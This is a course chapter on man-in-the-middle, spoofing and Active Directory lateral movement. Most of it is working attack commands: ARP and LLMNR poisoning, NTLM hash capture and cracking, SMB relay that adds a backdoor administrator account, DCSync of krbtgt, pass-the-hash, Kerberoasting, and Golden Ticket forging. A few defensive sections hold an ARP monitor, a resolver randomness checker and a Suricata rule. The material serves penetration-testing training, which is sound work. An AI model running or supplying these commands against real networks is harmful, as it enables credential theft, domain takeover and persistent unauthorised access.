Chapter 3.3 - Man-in-the-Middle, Spoofing & Lateral Movement
Module 3: Offensive Security & Exploitation Prerequisites: Chapter 3.2 (Exploitation Techniques)
Table of Contents
- Network Interception Fundamentals - ARP, LLMNR & NBNS
- ARP Poisoning & Layer-2 MITM
- LLMNR/NBT-NS Poisoning & NTLM Capture
- SMB Relay Attacks - Credential Relay to RCE
- DNS Spoofing & BGP Hijacking
- IPv6 Attacks - SLAAC Abuse & DHCPv6 Spoofing
- Lateral Movement in Active Directory Environments
- Kerberos Attacks - Kerberoasting, AS-REP Roasting & Pass-the-Ticket
- Defensive Detections & Mitigations
- MITRE ATT&CK Mapping
1. Network Interception Fundamentals - ARP, LLMNR & NBNS
Man-in-the-middle attacks position an attacker between two communicating parties, enabling passive interception, active modification, or credential capture. On modern Ethernet networks, the attack surface divides into three protocol families - each with different scope, requirements, and detection characteristics.
Why These Protocols Are Exploitable
| Protocol | Purpose | Vulnerability | Scope |
|---|---|---|---|
| ARP | Map IP to MAC on local segment | Stateless, no authentication; any host can claim any IP | Local subnet only |
| LLMNR | Resolve hostnames when DNS fails | Responds to any query; no source validation | Local subnet only |
| NBT-NS | NetBIOS name resolution (legacy) | Same as LLMNR | Local subnet only |
| mDNS | Multicast DNS (Bonjour/Avahi) | No authentication on announcements | Local subnet only |
| DHCPv6 | IPv6 address assignment | Rogue server wins if responds faster | Local subnet only |
| DNS | Global name resolution | Cache poisoning, rogue server | Network-wide |
All of the local-segment attacks share a common property: they exploit unauthenticated broadcast/multicast protocols where the first responder wins. This is a design characteristic, not a bug - these protocols were designed for efficiency on trusted LANs that no longer exist.
2. ARP Poisoning & Layer-2 MITM
ARP (Address Resolution Protocol) maps IP addresses to MAC addresses on a local subnet. It is completely stateless - a host will update its ARP cache whenever it receives an ARP reply, whether it requested one or not. An attacker sends gratuitous ARP replies claiming to be the default gateway (to intercept all outbound traffic) or specific hosts (to intercept point-to-point traffic).
ARP Poisoning with arpspoof
```bash
# Enable IP forwarding - CRITICAL: without this, you drop all traffic (DoS)
echo 1 > /proc/sys/net/ipv4/ip_forward
# Make permanent:
sysctl -w net.ipv4.ip_forward=1
echo "net.ipv4.ip_forward = 1" >> /etc/sysctl.conf

# ARP spoof - tell victim (192.168.1.100) that gateway (192.168.1.1) is us
#   -i eth0           interface
#   -t 192.168.1.100  target (victim) IP
#   192.168.1.1       IP to impersonate (gateway)
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
# Run in background: arpspoof ... &

# ARP spoof the other direction - tell gateway that victim is us
#   -t 192.168.1.1    target (gateway)
#   192.168.1.100     IP to impersonate (victim)
arpspoof -i eth0 -t 192.168.1.1 192.168.1.100
# Both directions must run simultaneously for bidirectional MITM
# Run each in a separate terminal or background them
```
ARP Poisoning with Bettercap
Bettercap is the modern standard for MITM attacks - it handles ARP poisoning, sniffing, and protocol capture in an integrated framework:
```bash
# Install bettercap
apt install bettercap
# Or: go install github.com/bettercap/bettercap@latest
# Interactive mode
bettercap -iface eth0
# Inside bettercap interactive console:
> net.probe on                                # Discover hosts on subnet
> net.show                                    # Show discovered hosts
# ARP spoof specific target
> set arp.spoof.targets 192.168.1.100         # Victim IP
> arp.spoof on                                # Start poisoning (auto-enables IP forwarding)
# Sniff HTTP traffic
> net.sniff on                                # Passive sniffer
> set net.sniff.verbose true
# HTTP proxy (inspect/modify HTTP traffic in flight)
> http.proxy on
> set http.proxy.injectjs "alert('MITM')"     # Inject JavaScript into all HTTP pages
# HTTPS downgrade / stripping (when HSTS not enforced)
> https.proxy on
# Capture credentials from captured traffic
> set net.sniff.regexp ".*password.*"         # Filter for password strings
> net.sniff on

# Caplets - scripted bettercap sessions
cat > /tmp/arp_mitm.cap << 'EOF'
net.probe on
sleep 3
set arp.spoof.targets 192.168.1.100
arp.spoof on
net.sniff on
EOF
bettercap -iface eth0 -caplet /tmp/arp_mitm.cap
```
Capturing Traffic During MITM
```bash
# Capture all traffic between victim and gateway during ARP poison
tcpdump -i eth0 \
  -w /tmp/mitm_capture.pcap \
  host 192.168.1.100            # Capture only victim's traffic
# Filter for cleartext credentials in captured traffic
tcpdump -r /tmp/mitm_capture.pcap -A | \
  grep -iE "password|passwd|login|credential|Authorization"
# Extract HTTP objects from capture
tcpdump -r /tmp/mitm_capture.pcap -w - | \
  tcpflow -r - -o /tmp/http_objects/   # Extract TCP streams
# Or use Wireshark/tshark for protocol-aware extraction
tshark -r /tmp/mitm_capture.pcap \
  -Y 'http.request.method == "POST"' \
  -T fields \
  -e ip.src -e http.host -e http.request.uri -e http.file_data
```
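A defender-side complement to the poisoning described in this section, added here as an example and not part of the original chapter: a small Python monitor that parses raw Ethernet/ARP frames, keeps a baseline of trusted IP-to-MAC bindings, and flags the two signatures a bidirectional ARP poison leaves (a baseline IP suddenly claimed by a different MAC, and one MAC claiming both the gateway and the victim). The MACs, addresses and frames are constructed sample data.

```python
"""ARP poisoning monitor: parses Ethernet/ARP frames and flags conflicting bindings.
Constructed sample data; the structure mirrors what a sniffer thread would feed it."""
import struct
from collections import defaultdict

ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2

def _ip_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))

def build_arp(src_mac: bytes, src_ip: str, dst_mac: bytes, dst_ip: str, op: int = ARP_REPLY) -> bytes:
    """Build an Ethernet II frame carrying an ARP packet (only used to construct sample traffic)."""
    eth = dst_mac + src_mac + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)   # hw=Ethernet, proto=IPv4, hlen=6, plen=4
    return eth + arp + src_mac + _ip_bytes(src_ip) + dst_mac + _ip_bytes(dst_ip)

def parse_arp(frame: bytes):
    """Return (opcode, sender_mac, sender_ip) for an ARP-over-Ethernet frame, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    hw_type, proto, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (hw_type, proto, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sender_mac = frame[22:28].hex(":")
    sender_ip = ".".join(str(b) for b in frame[28:32])
    return op, sender_mac, sender_ip

class ArpMonitor:
    """Tracks IP->MAC bindings learned from ARP replies against a trusted baseline."""

    def __init__(self, baseline: dict):
        self.bindings = dict(baseline)      # trusted IP -> MAC (gateway, servers); never overwritten
        self.claims = defaultdict(set)      # MAC -> every IP it has claimed in a reply

    def observe(self, frame: bytes) -> list:
        parsed = parse_arp(frame)
        if parsed is None:
            return []
        op, mac, ip = parsed
        if op != ARP_REPLY:
            return []                       # requests carry no binding claim worth alerting on
        alerts = []
        known = self.bindings.get(ip)
        if known is None:
            self.bindings[ip] = mac         # first sighting: learn it (a real tool would age entries)
        elif known != mac:
            alerts.append(f"binding conflict: {ip} is {known} in baseline but claimed by {mac}")
        self.claims[mac].add(ip)
        if len(self.claims[mac]) > 1:
            # One MAC answering for several IPs is exactly what two arpspoof processes produce.
            # Routers with several addresses also do this, so treat it as a lower-confidence signal.
            alerts.append(f"{mac} has claimed multiple IPs: {sorted(self.claims[mac])}")
        return alerts

# Constructed sample: gateway .1, victim .100, and a third host poisoning both directions.
GATEWAY_MAC = bytes.fromhex("aabbcc000001")
VICTIM_MAC = bytes.fromhex("aabbcc000064")
ATTACKER_MAC = bytes.fromhex("deadbeef0001")

def run_sample() -> list:
    """Replay one legitimate reply followed by the two poison replies of a bidirectional MITM."""
    monitor = ArpMonitor({"192.168.1.1": "aa:bb:cc:00:00:01", "192.168.1.100": "aa:bb:cc:00:00:64"})
    frames = [
        build_arp(GATEWAY_MAC, "192.168.1.1", VICTIM_MAC, "192.168.1.100"),    # genuine gateway reply
        build_arp(ATTACKER_MAC, "192.168.1.1", VICTIM_MAC, "192.168.1.100"),   # "the gateway is me" -> victim
        build_arp(ATTACKER_MAC, "192.168.1.100", GATEWAY_MAC, "192.168.1.1"),  # "the victim is me" -> gateway
    ]
    return [alert for frame in frames for alert in monitor.observe(frame)]

if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

On a real segment the frames would come from a raw socket or a pcap; the baseline is what makes the conflict alert reliable, since learned-only tables simply adopt the poisoned binding.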
3. LLMNR/NBT-NS Poisoning & NTLM Capture
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Windows fallback name resolution protocols used when DNS fails. When a Windows host cannot resolve a hostname via DNS, it broadcasts an LLMNR query to the subnet. Any host can respond - including an attacker.
The attack flow:
- Victim types `\\fileserver\share` or a typo like `\\filesrver\docs`
- DNS fails; Windows falls back to LLMNR broadcast: "Who is 'filesrver'?"
- Attacker's Responder responds: "I am 'filesrver', authenticate to me"
- Windows sends NTLM authentication - attacker captures the NTLMv2 hash
- Hash is cracked offline or relayed to authenticate elsewhere
Responder - LLMNR/NBT-NS/mDNS Poisoner
```bash
# Responder listens on a network interface and answers all name queries
# Configuration file: /etc/responder/Responder.conf
# Basic run - capture NTLMv2 hashes from all name resolution failures
#   -I eth0  listen interface
#   -r       answer NETBIOS queries
#   -d       enable DHCP poisoning
#   -w       start WPAD rogue server
#   -v       verbose
responder -I eth0 -rdw -v
# Responder output shows captured hashes:
# [SMB] NTLMv2-SSP Client   : 192.168.1.105
# [SMB] NTLMv2-SSP Username : CORP\jsmith
# [SMB] NTLMv2-SSP Hash     : jsmith::CORP:aabbccdd...:1122334455...
# Captured hashes are saved to /var/log/responder/
ls /var/log/responder/
cat /var/log/responder/SMB-NTLMv2-SSP-192.168.1.105.txt
```
Cracking NTLMv2 Hashes
```bash
# hashcat - GPU-accelerated hash cracking
# Mode 5600 = NTLMv2 (NetNTLMv2)
#   -m 5600  hash type: NTLMv2
#   -r       apply mutation rules
#   --force  ignore warnings
#   -O       optimized kernels (faster)
hashcat -m 5600 \
  /var/log/responder/SMB-NTLMv2-SSP-*.txt \
  /usr/share/wordlists/rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule \
  --force -O
# Show cracked passwords
hashcat -m 5600 /var/log/responder/SMB-NTLMv2-SSP-*.txt --show
# Rule-based attack (much higher hit rate than plain wordlist)
# d3ad0ne.rule = extensive mutation rules
hashcat -m 5600 hashes.txt \
  /usr/share/wordlists/rockyou.txt \
  -r /usr/share/hashcat/rules/d3ad0ne.rule \
  -r /usr/share/hashcat/rules/toggles1.rule
# Mask attack - when password policy is known (e.g., 8+ chars, 1 uppercase, 1 digit)
#   -a 3  attack mode: mask (?u=upper ?l=lower ?d=digit)
hashcat -m 5600 hashes.txt -a 3 "?u?l?l?l?l?l?d?d"
# john the ripper alternative
john --format=netntlmv2 \
  --wordlist=/usr/share/wordlists/rockyou.txt \
  /var/log/responder/SMB-NTLMv2-SSP-*.txt
```
4. SMB Relay Attacks - Credential Relay to RCE
Rather than cracking NTLMv2 hashes (which can take hours/days for strong passwords), SMB relay attacks use the captured authentication in real time, relaying it to another host to gain an authenticated session - no cracking required.
Prerequisite: The target host must have SMB signing disabled. Domain Controllers have signing enabled by default; workstations often do not.
Attack Setup - Responder + ntlmrelayx
```bash
# Step 1: Disable Responder's SMB and HTTP servers
# (ntlmrelayx will handle these protocols instead)
sed -i 's/SMB = On/SMB = Off/' /etc/responder/Responder.conf
sed -i 's/HTTP = On/HTTP = Off/' /etc/responder/Responder.conf
# Step 2: Build relay target list (hosts with signing disabled)
# Only includes hosts where signing=False
cme smb 192.168.1.0/24 --gen-relay-list /tmp/relay_targets.txt
# Step 3: Start Responder (LLMNR/NBT-NS poisoning only, no SMB/HTTP server)
responder -I eth0 -rdw &
# Step 4: Start ntlmrelayx targeting the relay list
#   -tf           target list
#   -smb2support  support SMB2
#   -socks        create a SOCKS proxy per relayed session
#                 (allows reuse without re-authentication)
impacket-ntlmrelayx -tf /tmp/relay_targets.txt -smb2support -socks
# Alternative: execute a command on relay success
# (adds a local admin account on every successfully relayed host)
impacket-ntlmrelayx -tf /tmp/relay_targets.txt -smb2support \
  -c "net user hacker P@ssword123! /add && net localgroup administrators hacker /add"
# Alternative: dump SAM database on relay success
impacket-ntlmrelayx -tf /tmp/relay_targets.txt -smb2support \
  --dump-lm   # Dump local SAM hashes on each relayed session
```
Using Relayed Sessions via SOCKS
```bash
# ntlmrelayx with -socks creates authenticated SOCKS connections
# List active relayed sessions
> socks
# Output:
# Protocol  Target         Username     AdminStatus  Port
# SMB       192.168.1.150  CORP\jsmith  TRUE         1081
# SMB       192.168.1.151  CORP\jsmith  TRUE         1082
# Connect to relayed sessions via proxychains
# /etc/proxychains4.conf: socks4 127.0.0.1 1081
proxychains impacket-secretsdump \
  CORP/jsmith@192.168.1.150 \
  -no-pass   # Auth via SOCKS relay - no password needed
proxychains impacket-psexec \
  CORP/jsmith@192.168.1.150 \
  -no-pass   # Interactive shell via relay
```
HTTP/HTTPS Relay (WebDAV & WPAD)
NTLM authentication is not limited to SMB - it also occurs in HTTP/HTTPS contexts (WebDAV, OWA, WPAD proxy auto-config). ntlmrelayx can relay HTTP authentication to SMB and vice versa:
```bash
# Relay HTTP NTLM to SMB
#   --http-port 80  accept incoming HTTP NTLM
impacket-ntlmrelayx -tf /tmp/relay_targets.txt -smb2support --http-port 80 -socks
# WPAD poisoning - force all Windows hosts to authenticate to attacker's proxy
# Responder handles this with the -w (--wpad) flag:
# Windows requests http://wpad/wpad.dat - Responder claims to be WPAD server
# Windows sends NTLM credentials to "authenticate" to the proxy
responder -I eth0 -rdw
```
5. DNS Spoofing & BGP Hijacking
DNS Cache Poisoning
DNS cache poisoning injects fraudulent records into a recursive resolver's cache, redirecting all users of that resolver to attacker-controlled infrastructure. The classic Kaminsky attack (2008) exploits the predictability of transaction IDs and source ports.
```bash
# dnschef - DNS proxy for targeted spoofing (testing/pentest contexts)
# Spoofs resolution for specific domains while passing others through
#   --fakeip       IP to return for spoofed domains
#   --fakedomains  domains to spoof
#   --nameservers  forward all other queries here
dnschef --fakeip 192.168.1.50 \
  --fakedomains "target-corp.com,*.target-corp.com" \
  --nameservers 8.8.8.8 \
  --interface 0.0.0.0 --port 53
# Bettercap DNS spoofing (during ARP MITM - redirect DNS through your server)
> set dns.spoof.domains target-corp.com,*.target-corp.com
> set dns.spoof.address 192.168.1.50   # Return your IP for spoofed domains
> dns.spoof on
> arp.spoof on                         # Must be MITM to intercept DNS queries
# Verify DNS spoofing is working from victim's perspective
# (on victim machine or simulate with dig through specific server)
dig @192.168.1.50 target-corp.com      # Query your DNS server directly
```
Testing Your Own Infrastructure for Cache Poisoning Vulnerability
```bash
# Check if your resolver randomizes source ports (Kaminsky patch)
# Low port entropy = vulnerable to classic cache poisoning
# Run many times while capturing the resolver's outgoing queries (tcpdump -n udp port 53);
# vary the name, or cached answers will not trigger an upstream query.
# The source port and transaction ID should differ unpredictably between queries.
dig +short @YOUR_RESOLVER example.com
# DNS Security Extensions (DNSSEC) validation test
dig @YOUR_RESOLVER dnssec-failed.org       # Should return SERVFAIL if DNSSEC enforced
dig @YOUR_RESOLVER dnssec-failed.org +cd   # With checking disabled - should return data
# Check if DNSSEC is enabled on your zone
dig @ns1.yourdomain.com yourdomain.com DNSKEY
dig @ns1.yourdomain.com yourdomain.com DS
```
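To make the first check concrete: what matters is not that ports differ from query to query but that neither the port nor the transaction ID is predictable. The Python below, added as an example and not part of the chapter, parses tcpdump lines for the queries your resolver sends upstream, estimates the entropy of the port and ID sequences against the bound the sample size allows, and separately tests for sequential allocation, which an entropy estimate alone cannot tell apart from randomness. The resolver address, upstream address and captured lines are constructed.

```python
"""Estimate source-port / transaction-ID unpredictability of a resolver from tcpdump output.
`tcpdump -n udp port 53` prints lines such as:
  12:00:00.000001 IP 10.0.0.53.41234 > 8.8.8.8.53: 12345+ A? example.com. (29)
Addresses and lines here are constructed."""
import math
import random
import re
from collections import Counter

QUERY_RE = re.compile(r"IP (?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.53: (?P<txid>\d+)\+? ")

def parse_queries(lines, resolver_ip: str):
    """Return [(source_port, txid)] for queries the resolver sent upstream."""
    samples = []
    for line in lines:
        m = QUERY_RE.search(line)
        if m and m.group("src") == resolver_ip:
            samples.append((int(m.group("sport")), int(m.group("txid"))))
    return samples

def shannon_bits(values) -> float:
    """Empirical entropy; an n-sample estimate cannot exceed log2(n), so compare against that bound."""
    n = len(values)
    return -sum(c / n * math.log2(c / n) for c in Counter(values).values())

def sequential_fraction(values) -> float:
    """Fraction of consecutive samples that increment by exactly one (mod 2^16)."""
    if len(values) < 2:
        return 0.0
    steps = sum(1 for a, b in zip(values, values[1:]) if (b - a) % 65536 == 1)
    return steps / (len(values) - 1)

def assess(samples) -> dict:
    ports = [p for p, _ in samples]
    txids = [t for _, t in samples]
    bound = math.log2(len(samples))          # best an n-sample entropy estimate can reach
    result = {
        "port_bits": shannon_bits(ports), "txid_bits": shannon_bits(txids),
        "port_sequential": sequential_fraction(ports) > 0.9,
        "txid_sequential": sequential_fraction(txids) > 0.9,
    }
    if result["port_bits"] < 0.5 * bound or result["port_sequential"]:
        result["verdict"] = "vulnerable: source port predictable (only the 16-bit ID protects the cache)"
    elif result["txid_bits"] < 0.5 * bound or result["txid_sequential"]:
        result["verdict"] = "vulnerable: transaction ID predictable"
    else:
        result["verdict"] = "randomized"
    return result

def constructed_capture(kind: str, n: int = 256, resolver_ip: str = "10.0.0.53"):
    """Generate tcpdump-style lines for three resolver behaviours (constructed sample data)."""
    rng = random.Random(7)
    lines = []
    for i in range(n):
        if kind == "fixed_port":          # pre-patch style: one socket, one port for every query
            port = 53
        elif kind == "sequential_port":   # distinct but predictable ports
            port = 32768 + i
        else:                             # randomized ports
            port = rng.randrange(1024, 65536)
        txid = rng.randrange(0, 65536)
        lines.append(f"12:00:{i % 60:02d}.{i:06d} IP {resolver_ip}.{port} > 198.51.100.1.53: "
                     f"{txid}+ A? example.com. (29)")
    return lines

def assess_capture(kind: str) -> dict:
    return assess(parse_queries(constructed_capture(kind), "10.0.0.53"))
```

Feed `parse_queries` the real capture (for example `open("queries.txt")`) with your resolver's address to assess a production resolver; a few hundred upstream queries are enough for the estimate.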
6. IPv6 Attacks - SLAAC Abuse & DHCPv6 Spoofing
IPv6 is enabled by default on all modern Windows, Linux, and macOS systems - and almost universally misconfigured in enterprise environments. Most organizations have IPv4 security controls but no equivalent IPv6 monitoring or filtering. Attackers exploit this gap.
mitm6 - DHCPv6 + DNS Spoofing
mitm6 exploits Windows' preference for IPv6 over IPv4. It sends DHCPv6 responses assigning itself as the IPv6 default gateway and DNS server. Windows will then use the attacker's DNS server for all queries - and when DNS fails, fall back to LLMNR/NBT-NS over IPv6.
```bash
# mitm6 - respond to DHCPv6 requests, become the IPv6 DNS server
pip install mitm6
# or: git clone https://github.com/dirkjanm/mitm6
# Basic run - attack all hosts on the subnet
#   -d corp.local  domain name (for WPAD targeting)
#   -i eth0        interface
#   -v             verbose
mitm6 -d corp.local -i eth0 -v
# Target specific hosts only
mitm6 -d corp.local -hw WORKSTATION01 -i eth0

# mitm6 + ntlmrelayx - combined attack
# Terminal 1: mitm6
mitm6 -d corp.local -i eth0
# Terminal 2: ntlmrelayx (relay captured NTLM over IPv6 to IPv4 targets)
#   -6   listen on IPv6
#   -tf  IPv4 targets (signing disabled)
#   -wh  WPAD hostname to serve
impacket-ntlmrelayx -6 -tf /tmp/relay_targets.txt -smb2support -socks \
  -wh attacker-wpad.corp.local
# The flow:
# 1. mitm6 assigns attacker as IPv6 DNS server via DHCPv6
# 2. Windows requests WPAD configuration via IPv6 DNS
# 3. ntlmrelayx serves WPAD requiring NTLM authentication
# 4. Windows authenticates - ntlmrelayx relays to SMB targets
# 5. Attacker gets authenticated sessions to all signing-disabled hosts
```
7. Lateral Movement in Active Directory Environments
Once a foothold is established, lateral movement spreads access across the network. Active Directory environments provide rich lateral movement opportunities because credentials and trust relationships are centralized.
Pass-the-Hash & Pass-the-Ticket
```bash
# Pass-the-Hash - use NTLM hash without knowing plaintext password
# Requires: NTLM hash of a local admin account on target
# -hashes takes LMHASH:NTHASH (the LM half may be left empty: -hashes :NTHASH)
# psexec (creates a service - noisy, leaves artifacts)
impacket-psexec "CORP/Administrator@192.168.1.150" \
  -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
# wmiexec (no service creation - stealthier)
impacket-wmiexec "CORP/Administrator@192.168.1.150" \
  -hashes :NTLM_HASH_HERE \
  "whoami /all"   # Run single command and exit
# smbexec (uses existing shares, no service)
impacket-smbexec "CORP/Administrator@192.168.1.150" \
  -hashes :NTLM_HASH_HERE
# atexec (uses Task Scheduler - async)
impacket-atexec "CORP/Administrator@192.168.1.150" \
  -hashes :NTLM_HASH_HERE \
  "net user"
# CrackMapExec sweep - test hash against entire subnet
#   --local-auth  use local account (not domain)
#   -x            execute command on all successful hosts
cme smb 192.168.1.0/24 -u Administrator -H :NTLM_HASH_HERE --local-auth -x "hostname"
```
WMI Lateral Movement
Windows Management Instrumentation (WMI) allows remote management and code execution - heavily used by both admins and attackers because it is built-in and often allowed by firewall rules:
```bash
# wmiexec - execute commands via WMI (requires credentials or hash)
impacket-wmiexec CORP/jsmith:Password123@192.168.1.150
```

```powershell
# PowerShell WMI (from already-compromised Windows host)
Invoke-WmiMethod -ComputerName TARGET `
    -Class Win32_Process `
    -Name Create `
    -ArgumentList "powershell -enc [base64_encoded_command]"
```

```bash
# CrackMapExec via WMI - check who's local admin on each host
cme wmi 192.168.1.0/24 -u jsmith -p 'Password123' -x "net localgroup administrators"
```
PowerShell Remoting (WinRM)
WinRM (Windows Remote Management) runs on port 5985 (HTTP) and 5986 (HTTPS). Members of the Remote Management Users group or local administrators can connect:
```bash
# Check WinRM access with CrackMapExec
cme winrm 192.168.1.0/24 -u jsmith -p 'Password123'
# Pwn3d! = WinRM access + admin rights
# [+]    = WinRM access, non-admin
# evil-winrm - interactive WinRM shell
evil-winrm -i 192.168.1.150 -u jsmith -p 'Password123'
# Or with hash:
evil-winrm -i 192.168.1.150 -u Administrator -H NTLM_HASH
# Inside evil-winrm:
*Evil-WinRM* PS> whoami
*Evil-WinRM* PS> upload /tmp/tool.exe C:\Windows\Temp\tool.exe
*Evil-WinRM* PS> download C:\Users\admin\Documents\creds.txt
*Evil-WinRM* PS> services                          # List services
*Evil-WinRM* PS> Invoke-Binary /tmp/compiled.exe   # Run uploaded binary
```
DCSync - Domain Credential Replication
DCSync abuses the Directory Replication Service (DRS) protocol to pull password hashes directly from a Domain Controller without logging on to it. Requires DS-Replication-Get-Changes-All privilege - held by Domain Admins, Enterprise Admins, and any account explicitly granted it.
```bash
# DCSync with Impacket secretsdump (192.168.1.10 = DC IP)
#   -just-dc     only pull DC secrets (faster)
#   -outputfile  save output
impacket-secretsdump "CORP/DomainAdmin:Password@192.168.1.10" \
  -just-dc -outputfile /tmp/dcsync_hashes
# DCSync specific account only
# -just-dc-user krbtgt: krbtgt hash (Golden Ticket prep)
impacket-secretsdump "CORP/DomainAdmin:Password@192.168.1.10" -just-dc-user "krbtgt"
impacket-secretsdump "CORP/DomainAdmin:Password@192.168.1.10" -just-dc-user "Administrator"
# DCSync from Meterpreter (Mimikatz/Kiwi extension)
meterpreter > load kiwi
meterpreter > dcsync_ntlm krbtgt          # Get krbtgt NTLM hash
meterpreter > dcsync_ntlm Administrator   # Get DA hash
# Output: NTLM hash of krbtgt - used to forge Golden Tickets
```
8. Kerberos Attacks - Kerberoasting, AS-REP Roasting & Pass-the-Ticket
Kerberos is the default authentication protocol in Active Directory. Its ticket-based architecture introduces unique attack vectors that do not exist in NTLM authentication.
Kerberos Ticket Flow
```text
Client -> KDC (AS-REQ)                       -> TGT issued (encrypted with krbtgt hash)
Client -> KDC (TGS-REQ, presents TGT)        -> Service Ticket issued (encrypted with service account hash)
Client -> Service (presents Service Ticket)  -> Access granted
```
The critical insight: service tickets are encrypted with the service account's NTLM hash. Any domain user can request a service ticket for any SPN. If the service account uses a weak password, the ticket can be cracked offline.
Kerberoasting
```bash
# Step 1: Find accounts with Service Principal Names (SPNs registered)
# These are the targets - their tickets can be requested and cracked
#   "CORP/jsmith:Password123"  any domain credential (GetUserSPNs takes domain/user:password;
#                              the DC is given with -dc-ip, not with @host)
#   -request                   also request the tickets
impacket-GetUserSPNs "CORP/jsmith:Password123" \
  -dc-ip 192.168.1.10 -request -outputfile /tmp/kerberoast_hashes.txt
# Alternative: using ldapsearch (from Chapter 3.1)
ldapsearch -x -h 192.168.1.10 \
  -D "jsmith@corp.local" -w 'Password123' \
  -b "DC=corp,DC=local" \
  "(&(objectclass=user)(servicePrincipalName=*))" \
  sAMAccountName servicePrincipalName
# Step 2: Crack TGS tickets (hashcat mode 13100 = Kerberos TGS-REP etype 23)
hashcat -m 13100 /tmp/kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule -O
# Kerberoasting from Windows (PowerView)
# Import-Module .\PowerView.ps1
# Get-DomainUser -SPN -Properties SamAccountName,ServicePrincipalName
# Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File kerberoast.txt
```
AS-REP Roasting
Accounts with "Do not require Kerberos preauthentication" enabled will return an AS-REP message encrypted with the user's password hash - without requiring any prior authentication. This hash is crackable offline.
```bash
# Find accounts with preauthentication disabled
#   "CORP/"     domain
#   -usersfile  username list (from LDAP enumeration)
#   -format     output format for hashcat
#   -no-pass    no credentials needed
impacket-GetNPUsers "CORP/" -usersfile /tmp/users.txt -dc-ip 192.168.1.10 \
  -format hashcat -outputfile /tmp/asrep_hashes.txt -no-pass
# With credentials (more reliable - LDAP query for vulnerable accounts)
impacket-GetNPUsers "CORP/jsmith:Password123" -dc-ip 192.168.1.10 \
  -format hashcat -outputfile /tmp/asrep_hashes.txt
# Crack AS-REP hashes (hashcat mode 18200 = Kerberos AS-REP etype 23)
hashcat -m 18200 /tmp/asrep_hashes.txt /usr/share/wordlists/rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule
```
Pass-the-Ticket (PtT)
Kerberos tickets (TGTs and Service Tickets) can be extracted from memory and reused on other machines - no password or hash required.
```bash
# Extract tickets from memory (Mimikatz on Windows)
# sekurlsa::tickets /export - Export all tickets to .kirbi files
# kerberos::list /export    - List and export from Kerberos cache
# From Meterpreter:
meterpreter > load kiwi
meterpreter > kerberos_ticket_list                          # List all Kerberos tickets in memory
meterpreter > kerberos_ticket_use /tmp/Administrator.kirbi  # Import a ticket
# Dump tickets with Rubeus (Windows, .NET)
# .\Rubeus.exe dump /nowrap     - Dump all TGTs
# .\Rubeus.exe tgtdeleg /nowrap - Downgrade and dump usable TGT
# Pass-the-Ticket with Impacket
export KRB5CCNAME=/tmp/administrator.ccache   # Set ticket cache
#   -k        use Kerberos authentication
#   -no-pass  no password - use ticket
#   target must be the FQDN for Kerberos
impacket-psexec -k -no-pass CORP/Administrator@dc01.corp.local
# Verify ticket is working
klist   # List cached Kerberos tickets
```
Golden Ticket Attack
With the krbtgt NTLM hash (obtained via DCSync), an attacker can forge a Ticket Granting Ticket (TGT) for any user, with any group memberships, valid for any duration. This is the ultimate AD persistence mechanism - survives password resets of all accounts except krbtgt.
```bash
# Requirements:
# - krbtgt NTLM hash (from DCSync)
# - Domain SID (from LDAP or secretsdump output)
# - Domain name (FQDN)
# Get domain SID
impacket-lookupsid "CORP/jsmith:Password123@192.168.1.10"
# Output: CORP-S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX (domain SID)
# Forge Golden Ticket with Impacket
#   -nthash      krbtgt hash from DCSync
#   -domain-sid  domain SID
#   -domain      domain FQDN
#   -groups 512  group 512 = Domain Admins
#   -duration    valid for 3650 days
#   last arg     username in the ticket (can be anything)
impacket-ticketer -nthash KRBTGT_NTLM_HASH \
  -domain-sid S-1-5-21-XXXX-XXXX-XXXX \
  -domain corp.local \
  -groups 512 \
  -duration 3650 \
  backdoor_admin
# Use the Golden Ticket
export KRB5CCNAME=backdoor_admin.ccache
impacket-psexec -k -no-pass CORP/backdoor_admin@dc01.corp.local
# Silver Ticket - forge service ticket for specific service (stealthier)
# Uses service account hash instead of krbtgt hash
#   -nthash  target service account hash
#   -spn     target SPN
#   last arg username to impersonate
impacket-ticketer -nthash SERVICE_ACCOUNT_HASH \
  -domain-sid S-1-5-21-XXXX \
  -domain corp.local \
  -spn cifs/fileserver.corp.local \
  jsmith
```
9. Defensive Detections & Mitigations
Detecting LLMNR/NBT-NS Poisoning
```
# Suricata - detect Responder's characteristic LLMNR responses
# |00 00 84 00| = LLMNR response flag bytes. A Suricata rule is one logical line;
# the backslashes continue it across lines.
alert udp any 5355 -> $HOME_NET any ( \
    msg:"LLMNR Response from Unexpected Host - Possible Poisoning"; \
    content:"|00 00 84 00|"; \
    threshold:type threshold, track by_src, count 5, seconds 10; \
    classtype:network-scan; \
    sid:9005001; rev:1; \
)
```

```powershell
# Disable LLMNR via Group Policy (the correct fix)
# Computer Configuration > Administrative Templates > Network >
# DNS Client > Turn off multicast name resolution > Enabled
# Disable NBT-NS via DHCP (option 43) or registry:
# HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\
# NetbiosOptions = 2 (disabled)
# PowerShell: disable NBT-NS on all adapters
$adapters = Get-WmiObject Win32_NetworkAdapterConfiguration | Where-Object {$_.IPEnabled}
foreach ($adapter in $adapters) {
    $adapter.SetTcpipNetbios(2)   # 2 = Disable NetBIOS over TCP/IP
}
```
